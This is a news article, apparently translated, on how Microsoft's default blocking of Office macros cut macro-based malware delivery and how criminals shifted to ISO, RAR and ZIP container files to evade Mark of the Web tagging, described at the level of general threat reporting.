How Microsoft sealed the main infection technique of cybercriminals

Is this the twilight of one of the techniques used by cybercriminals? According to cybersecurity firm Proofpoint, between October 2021 and June 2022, attackers reduced their use of VBA and XL4 macros by 66%. Behind these technical names is a command system integrated with Microsoft Office software (Word, Excel, Powerpoint…), which allows users to automate certain tasks such as updating the numbers from the database. or report writing.

Essential to the functioning of the HR and marketing divisions of thousands of companies, macros have also been exploited since the 2010s by cybercriminals, to the point of becoming the most widely used mechanism for the initial infection of victims. After years of not directly addressing the problem, Microsoft has been working on it since October 2021, with success. According to Proofpoint, it is “one of the biggest changes in the email threat environment in recent historyProblem: criminals have shifted their efforts to other infection techniques.

How Cybercriminals Hijack Microsoft Excel to Install Viruses

The trap of Office macros has finally been disarmed

In February 2022, Microsoft quietly announced that it would change the default macro settings for Office files received over the Internet. This anticipated change has been welcomed by the entire cybersecurity community. Specifically, the editor changed a button, which allows each user to manually activate macros. If the file contains a malicious macro, a simple click on the “yes” message box displayed when opening the document, and the damage is done. Since the change, this interaction is no longer possible. From now on, the user must contact the administrator of his computer network to activate macros, which limits the risks of falling into a trap and launching the deployment of malicious software.

If the biggest cybercriminal groups such as Emotet or Dridex have taken advantage of this method of attack, it is because it brings many advantages. First, it allows them to bypass antivirus detection tools in email services. And for good reason: the malicious Excel or Word file does not contain the virus strain itself. A macro is just a command, which will download and start installing malware when activated. However, identifying macro targets requires a high level of analysis, difficult to automate, especially since cybercriminals have methods to prevent the understanding of their macros.

Then, this method of infection requires little technical skills, which makes it possible to mobilize a large workforce of new criminals. It only takes a few brains to create macros and set up the infrastructure for infection, then anyone can launch attacks. All you have to do is write a convincing email (posing as a colleague or client, for example), encouraging the target to open the attachment and activate the macros. The more personalized this email is for the victim, the more likely it is to hit the mark.

Cybercriminals are adapting

From the first announcements from Microsoft in October, cybercriminals began to adapt their methods. According to Proofpoint researchers, they resorted to using “container files” – such as ISO (.iso), RAR (.rar) or ZIP (.zip) files – which are able to cover other files, to avoid new blocking of macros. Specifically, these extensions prevent Office suite software from using the “Mark of the Web” (MOTW) tag on files that contain malicious macros. However, this attribute indicates that a file has been downloaded from the Internet, which will activate the default blocking of macros.

Concretely, when the victim downloads a ZIP or ISO file, the latter receives the MOTW marker. But when the victim opens the .zip, the documents it contains are untagged, because they are not considered to have been downloaded from the Internet. Therefore cybercriminals can use this Trojan-like system to embed an Excel file with malicious macros, which can be activated by the victim because the new protection cannot be activated. The container can also carry .lnk, .dll or .exe files, which directly contain the virus.

However, this new method has some disadvantages. They require more clicks from the victim, which gives them more time to realize that the file is suspicious. Then, users are more careful with a file with an extension they don’t know than a Word or Excel file as they open several of them in a day. Suffice it to say that the change made by Microsoft has complicated the task of cybercriminals.